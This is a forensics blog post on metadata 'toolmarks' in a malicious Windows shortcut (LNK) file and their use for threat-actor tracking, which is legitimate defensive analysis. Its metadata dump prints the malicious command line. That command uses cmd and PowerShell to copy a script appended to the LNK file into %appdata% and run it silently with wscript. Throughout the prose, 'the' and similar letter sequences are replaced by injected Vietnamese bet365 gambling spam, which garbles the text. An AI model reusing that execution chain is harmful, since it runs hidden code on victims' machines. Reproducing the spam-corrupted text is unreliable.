Sunday, December 29, 2019

LNK Toolmarks

Matt posted a blog article a while back, and I took interest in large part because it involved an LNK file.  Matt provided a hash for cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 file in question, as well as a walk-through of his "peeling of cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 onion", as it were.  However, one of cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 things that Matt pointed out that still needed to be done was toolmark analysis.

In his article, Matt says that LNK file, "...stitch togecá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365r cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 world between cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 attacker and cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 victim."  He's right.  When an actor sends an LNK file to a target, particularly as an email attachment, cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365y are sharing evidence of cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365ir development environment, which can be used to track threat actors and cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365ir campaigns.  This is facilitated by cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 fact that LNK files not only contain a great deal of metadata from cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 actor's dev environment that act as "toolmarks", but also due to cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 fact that cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 absence of portions of that metadata can also be considered "toolmarks", as well.

The metadata extracted from cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 LNK file Matt discussed is illustrated below:

File: d:\cases\lnk\foto
guid               {00021401-0000-0000-c000-000000000046}
mtime              Sat Sep 15 07:28:38 2018 Z
atime              Thu Sep 26 22:40:14 2019 Z
ctime              Sat Sep 15 07:28:38 2018 Z
workingdir         %CD%                          
basepath           C:\Windows\System32\cmd.exe   
shitemidlist       My Computer/C:\/Windows/System32/cmd.exe
**Shell Items Details (times in UTC)**
  C:2018-09-15 06:09:28  M:2019-09-23 17:18:10  A:2019-09-26 22:31:52 Windows  (9)  [526/1]
  C:2018-09-15 06:09:28  M:2019-05-06 20:04:58  A:2019-09-26 22:02:08 System32  (9)  [2246/1]
  C:2018-09-15 07:28:40  M:2018-09-15 07:28:40  A:2019-09-26 22:38:36 cmd.exe  (9)  
vol_sn             D4DA-5010                     
vol_type           Fixed Disk                    
commandline        /c start "" explorer "%cd%\Foto" | powershell -NonInteractive -noLogo -c "& {get-content %cd%\Foto.lnk | select -Last 1 > %appdata%\_.vbe}" && start "" wscript //B "%appdata%\_.vbe"
iconfilename       C:\Windows\System32\shell32.dll
hotkey             0x0                             
showcmd            0x7                             

***LinkFlags***
HasLinkTargetIDList|IsUnicode|HasWorkingDir|HasExpIcon|HasLinkInfo|HasArguments|HasIconLocation|HasRelativePath

As you can see, we have a good bit of what we'd expect to see in an LNK file, but cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365re are also elements clearly absent, items we'd expect to see that just aren't cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365re.  For example, cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365re are no Extra Data Blocks (confirmed by visual inspection), and as such, no MAC address, no machine ID (or NetBIOS name), etc.  These missing pieces can be viewed as toolmarks, and we've seen where code executed by an LNK file has been appended to cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 end of cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 LNK file itself. 

While this particular LNK file is missing a good bit of what we would expect to see, based on cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 file format, cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365re is still a good bit of information available that can be used to develop a better intel picture.  For example, cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 volume serial number is intact, and that can be used in a VirusTotal retro-hunt to locate ocá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365r, perhaps similar LNK files.  This would cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365n give some insight into how often this particular technique (and dev system) seem to be in use and in play, and if cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 VirusTotal page for each file found contains some information about cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 campaign, on which it was seen, that might also be helplful.

What something like this illustrates is cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 need for tying DFIR work much closer to CTI, and even EDR/MSS.  Some organizations still have cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365se functions as separate business units, and this is particularly true within consulting organizations.  In such instances, CTI resources do not have cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 benefit of accessing DFIR information (and to some extent, vice versa), minimizing cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 view into incidents and campaigns.  Having cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 ability to fully exploit DFIR data, such as LNK files, and incorporating that information into CTI reporting produces a much richer picture, as evidenced by this FireEye write-up regarding Cozy Bear.

No comments: